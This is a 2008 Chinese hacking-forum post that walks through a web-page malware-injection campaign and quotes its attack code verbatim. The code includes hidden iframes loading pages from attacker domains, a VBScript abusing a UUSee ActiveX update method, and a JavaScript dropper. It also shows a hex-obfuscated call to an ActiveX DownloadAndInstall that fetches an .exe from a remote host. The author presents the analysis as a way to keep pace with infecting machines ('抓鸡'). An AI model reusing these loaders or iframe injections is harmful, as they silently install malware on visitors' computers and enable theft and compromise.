|
发表于 2008-7-29 16:43:57
|
显示全部楼层
来自 陕西省西安市
贴出来的那段js代码就不分析,能看懂代码知道是干什么的!
我是菜鸟一只,当然不知道是什么东西了,
不分析也罢!
我们来分析那几个马吧!
我已经帮大家下载回来了!
0day.txt应该就是被挂的页子,即上边说的那段js代码当中有一句xiao.htm
Copy code
document.writeln("<IFRaME src=http://www.5lal1a5.cn/xiao.htm width=100 height=0><\/IFRAME>");
我只是猜测,有心以身试马,可是没那么大的魄力!
然后0day.txt当中的代码
Copy code
<script language=javascript src=flash.js></script>
<iframe src=http://www.5lal1a5.cn/www/m5.htm width=0 height=0></iframe>
<iframe src=http://www.5lal1a5.cn/www/uu.htm width=0 height=0></iframe>
<iframe src=http://www.5lal1a5.cn/asp/as.htm width=0 height=0></iframe>
第一个,看名字也知道是flash马了!
至于第二个m5.htm我不知道是什么东西,就不说了!(等会分析~)
第三个uu.htm
Copy code
<html>
<object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target' ></object>
<script language='vbscript'>
arg1="\Program Files\Common Files\uusee\"
arg2="http://www.7o7o7o.cn/www/UUUpgrade.ini"
arg3="http://www.uusee.com/mini3/uusee_client_update/remark.php"
arg4=1
target.Update arg1 ,arg2 ,arg3 ,arg4
</script>
</html>
呵呵,这么明显的告诉我们了,uusee,是个网络电视吧,我不看电视的!
应该就是利用uusee的 漏洞,大家想继续了解的可以搜索下关于uusee的内容,如果没有的话!
那就是0day了!
第四个as.htm
Copy code
<SCRIPT LANGUAGE="javascript">window.status="";window.onerror=function(){return true;}
var expires=new Date();
expires.setTime(expires.getTime()+60*60*1000);
var set_cookie=document.cookie.indexOf("cdb=");
if(set_cookie==-1){document.cookie="cdb=1;expires="+expires.toGMTString();
try{var f;
var gw=new ActiveXObject("Downloader.DLoader.1")}catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=0 height=0 src=http:\/\/www.5lal1a5.cn\/asp\/m6.htm><\/iframe>")}else{document.write("<script src=http:\/\/www.5lal1a5.cn\/asp\/article.asp><\/sc"+"ript>")}}}
</Script>
虽然没有全部看懂,但是里边的document.write这句,我们以前挂马的时候好像也用过吧!
那么这应该就是个挂马咯!
看里边的内容就是m6.htm
我也已经下载下来了,打开看看
Copy code
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT><SCRIPT>
var PoHai="\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x78\x64\x6f\x77\x6e\x6c\x2e\x63\x6e\x2f\x6d\x6d\x2e\x65\x78\x65";install["\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x41\x6e\x64\x49\x6e\x73\x74\x61\x6c\x6c"](PoHai);</SCRIPT>
是个16进制加密的!
我们没必要解密了,如果大家想分析他的马的话,可以解密下载下来分析下!
不在本文的探讨范围内,
这里之说这句
Copy code
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT><SCRIPT>&
把这句
Copy code
78ABDC59-D8E7-44D3-9A76-9A0918C52B4A
拿到g.cn里边搜索
一下就明白了,原来是个新浪的某某某某漏洞!
既然能搜索得到,应该也是时间比较长的0day了!
然后分析了下师傅下载下来的那个mu.htm
以同样的方法!
是个access数据库的漏洞!
这下就都明白了!
后来问了下L.S.T的大牛之一Joli
他告诉我,现在网络上挂马的一般都是这几个!
没什么新内容!
抓鸡,得跟着时代步伐走了!
大牛们都这么挂!
咱也不能落后啊!
(本文仅贡学习讨论之用,请勿用于非法用途,否则后果自负) |
|